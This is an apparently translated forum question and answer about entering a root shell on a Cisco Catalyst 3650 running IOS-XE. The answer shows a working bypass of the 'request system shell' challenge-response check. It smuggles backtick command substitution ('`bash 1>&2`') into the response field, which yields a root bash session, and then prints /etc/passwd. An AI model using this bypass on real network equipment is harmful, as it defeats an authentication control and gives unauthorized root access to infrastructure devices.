IOS-XE:请求系统外壳漏洞

Question

Catalyst-3650#request system shell
Activity within this shell can jeopardize the functioning of the system.
Are you sure you want to continue? [y/n] y
Challenge: 94d5c01766c7a0a29c8c59fec3ab992[..]
Please enter the shell access response based on the
above challenge (Press "Enter" when done or to quit.):
/bin/sh
Key verification failed

我记得能够通过输入诸如'/bin/sh‘之类的琐碎内容来进入shell。我确信这不是一个梦，但我清楚地记得我没有把它写下来，因为我是那样的愚蠢。

那么，如何在Cisco催化剂3650上从IOS-XE进入bash呢？

Switch Ports Model              SW Version        SW Image              Mode
------ ----- -----              ----------        ----------            ----
*    1 28    WS-C3650-24PS      03.03.03SE        cat3k_caa-universalk9 INSTALL

Answer 1

Switch#request system shell
Activity within this shell can jeopardize the functioning of the system.
Are you sure you want to continue? [y/n] y
Challenge: 438e1fd36da9cfdb61e655353a48bb9cf69f274ab2d2[..]
Please enter the shell access response based on the above challenge 
(Press "Enter" when done or to quit.):
`/bin/sh`
sh-3.2# uname -a
sh-3.2#
sh-3.2# uname -2323
uname: invalid option -- '2'
Try `uname --help' for more information.
#AHA SO WE HAVE STDERR, but not STDOUT..
sh-3.2# ls
sh-3.2# pwd
sh-3.2# whoami
sh-3.2# exit
exit
Key verification failed

好吧，那我们再来一次。

Switch#request system shell
Activity within this shell can jeopardize the functioning of the system.
Are you sure you want to continue? [y/n] y
Challenge: b577ea00feb8c833d725a85c6c53e1839ab9[..]
Please enter the shell access response based on the above challenge
(Press "Enter" when done or to quit.):
`bash 1>&2`
bash-3.2# uname -a
Linux localhost 2.6.32.59-cavium-octeon2.cge-cavium-octeon #1 SMP PREEMPT Fri May 10 11:48:14 PDT 2013 mips64 GNU/Linux
bash-3.2# ls
BinOS       config     hugepages  lic0        rommon_to_env  sys     webui
RP_0_0_cli  crashinfo  include    lic1        root           tftp
auto        dev        install    lkern_init  sbin           tmp
bin         drec0      isan       misc        selinux        ucode0
bsn         epc        issu       mnt         share          usr
chasfs      etc        lib        obfl0       space          var
common      flash      lib32      proc        spi            vol
bash-3.2# whoami
root
bash-3.2# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
binos:x:85:85:binos administrative user:/usr/binos/conf:/usr/binos/conf/bshell.sh
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
[..]